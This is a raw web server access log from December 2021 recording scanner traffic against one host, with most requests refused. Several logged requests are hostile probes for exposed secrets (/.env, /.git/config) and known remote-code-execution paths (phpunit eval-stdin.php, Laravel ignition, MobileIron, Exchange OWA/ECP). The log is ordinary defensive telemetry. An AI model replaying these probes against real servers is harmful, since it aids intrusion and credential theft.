"/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Dec/2021:01:31:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 182.161.66.103] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" "-" [08/Dec/2021:01:33:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 130.211.54.158] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [08/Dec/2021:01:47:04 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:02:01:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [08/Dec/2021:02:01:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [08/Dec/2021:02:01:52 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [08/Dec/2021:02:26:40 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.211.176] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:03:02:22 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:03:03:37 +0000] 444 - GET https io.moralanimal.net "/" [Client 34.77.162.16] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [08/Dec/2021:03:11:30 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:03:23:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [08/Dec/2021:03:55:28 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 34.96.130.27] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [08/Dec/2021:05:05:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Dec/2021:05:06:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:05:41:46 +0000] 444 - OPTIONS https 64.22.31.253 "/" [Client 156.146.50.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36" "-" [08/Dec/2021:05:50:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:06:06:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [08/Dec/2021:06:35:50 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:06:36:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.212] [Length 0] [Gzip -] "-" "-" [08/Dec/2021:07:05:56 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:07:19:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:07:31:28 +0000] 444 - HEAD https 64.22.31.253 "/" [Client 165.227.34.91] [Length 0] [Gzip -] "-" "-" [08/Dec/2021:07:41:01 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 121.5.109.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "-" [08/Dec/2021:07:41:29 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 121.5.109.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "-" [08/Dec/2021:07:42:26 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 121.5.109.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "-" [08/Dec/2021:07:42:32 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 121.5.109.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "-" [08/Dec/2021:07:42:40 +0000] 444 - GET https 64-22-31-253.res.aeneas.net "/" [Client 121.5.109.55] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36" "-" [08/Dec/2021:08:06:01 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:08:06:01 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:08:09:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Dec/2021:08:37:07 +0000] 444 - GET https api.cbq66.com "/odd/app/download/list" [Client 45.61.188.100] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "https://api.cbq66.com" [08/Dec/2021:09:39:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.14.35.145] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Dec/2021:09:40:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 152.32.135.231] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Dec/2021:09:40:59 +0000] 444 - GET https api.38666.com "/digit/app/download/list" [Client 209.141.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" "https://api.38666.com" [08/Dec/2021:09:41:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 154.89.5.71] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [08/Dec/2021:10:07:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Dec/2021:10:30:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [08/Dec/2021:10:34:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Dec/2021:10:44:11 +0000] 400 - GET http 64.22.31.253 "/some" [Client 80.82.78.39] [Length 252] [Gzip -] "Mozilla/5.0" "-" [08/Dec/2021:11:04:48 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.213.188] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:12:15:55 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:13:52:49 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Dec/2021:13:52:49 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Dec/2021:14:29:40 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 221.130.37.146] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4472.114 Mobile Safari/537.36" "https://64.22.31.253/" [08/Dec/2021:14:57:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.64.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [08/Dec/2021:15:16:12 +0000] 444 - POST https 64.22.31.253 "/admin" [Client 45.61.146.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "-" [08/Dec/2021:15:16:13 +0000] 444 - POST https 64.22.31.253 "/admin" [Client 45.61.146.242] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36" "-" [08/Dec/2021:16:07:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.169.79] [Length 0] [Gzip -] "-" "-" [08/Dec/2021:16:09:27 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:16:35:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.206.71] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:17:35:16 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [08/Dec/2021:17:41:45 +0000] 400 - - http localhost "-" [Client 87.251.75.40] [Length 154] [Gzip -] "-" "-" [08/Dec/2021:17:42:06 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:17:50:31 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Dec/2021:18:29:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [08/Dec/2021:18:52:48 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:19:01:25 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Dec/2021:19:01:25 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [08/Dec/2021:19:38:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:19:41:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.95.200] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:19:41:16 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.166] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [08/Dec/2021:20:24:27 +0000] 444 - GET https 64.22.31.253 "/selfservice/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [08/Dec/2021:20:37:52 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [08/Dec/2021:20:57:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.206.128.66] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [08/Dec/2021:21:46:03 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:21:54:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [08/Dec/2021:22:38:44 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:22:56:38 +0000] 400 - HEAD http localhost "/" [Client 159.203.177.68] [Length 0] [Gzip -] "-" "-" [08/Dec/2021:22:56:39 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:39 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:39 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:39 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:40 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:40 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:40 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:40 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:40 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 159.203.177.68] [Length 252] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [08/Dec/2021:22:56:41 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 159.203.177.68] [Length 0] [Gzip -] "AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9" "-" [08/Dec/2021:22:56:41 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:41 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:41 +0000] 400 - GET http 64.22.31.253 "/gemini-iptv/vod.json" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:41 +0000] 444 - GET https 64.22.31.253 "/gemini-iptv/vod.json" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:41 +0000] 400 - GET http 64.22.31.253 "/" [Client 159.203.177.68] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:22:56:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 159.203.177.68] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [08/Dec/2021:23:11:33 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [08/Dec/2021:23:16:51 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 59.36.168.250] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [08/Dec/2021:23:44:49 +0000] 444 - GET https 64.22.31.253 "/ess/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [09/Dec/2021:00:15:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Dec/2021:00:39:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.9] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [09/Dec/2021:00:40:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:01:15:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.195.93.98] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [09/Dec/2021:01:32:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 185.180.143.79] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Dec/2021:01:37:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.116.157] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0" "-" [09/Dec/2021:01:48:28 +0000] 400 - POST https localhost "-" [Client 45.155.205.233] [Length 154] [Gzip -] "-" "-" [09/Dec/2021:01:58:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.82.105.39] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3032.84 Safari/537.32" "-" [09/Dec/2021:01:58:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 3.82.105.39] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3032.84 Safari/537.32" "-" [09/Dec/2021:03:04:23 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.210.40] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:03:10:54 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:03:10:54 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:03:13:18 +0000] 444 - GET https 253.31.22.64.aeneasdsl.com "/" [Client 50.17.141.62] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2; rv:72.0) Gecko/20100101 Firefox/72.0" "-" [09/Dec/2021:03:13:24 +0000] 444 - HEAD https 253.31.22.64.aeneasdsl.com "/favicon.ico" [Client 50.17.141.62] [Length 0] [Gzip -] "Opera/9.80 (Macintosh; Intel Mac OS X 10_14_5; U; en) Presto/2.2.15 Version/10.00" "-" [09/Dec/2021:03:53:43 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Dec/2021:03:53:43 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [09/Dec/2021:04:26:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.67] [Length 0] [Gzip -] "-" "-" [09/Dec/2021:04:53:25 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:04:53:26 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:07:51:43 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:07:51:43 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [09/Dec/2021:08:29:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 94.232.46.171] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" "-" [09/Dec/2021:08:33:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [09/Dec/2021:09:33:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.240.236.109] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:11:04:52 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.200.185] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [09/Dec/2021:11:09:45 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.155.205.233] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [09/Dec/2021:11:11:13 +0000] 444 - GET https localhost "/" [Client 111.13.63.96] [Length 0] [Gzip -] "-" "-" [09/Dec/2021:11:11:15 +0000] 444 - OPTIONS https localhost "/" [Client 111.13.63.96] [Length 0] [Gzip -] "-" "-" [09/Dec/2021:11:11:16 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 111.13.63.96] [Length 0] [Gzip -] "-" "-" [09/Dec/2021:11:11:18 +0000] 400 - - https localhost "-" [Client 111.13.63.96] [Length 154] [Gzip -] "-" "-" [09/Dec/2021:11:11:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 111.13.63.96] [Length 0] [Gzip -] "Go-http-client/2.0" "-" [09/Dec/2021:11:11:39 +0000] 444 - GET https owa.moralanimal.net "/" [Client 111.13.63.96] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Wappalyzer)" "-" [09/Dec/2021:11:11:40 +0000] 444 - GET https owa.moralanimal.net "/favicon.ico" [Client 111.13.63.96] [Length 0] [Gzip -] "Go-http-client/2.0" "-" [09/Dec/2021:11:28:08 +0000] 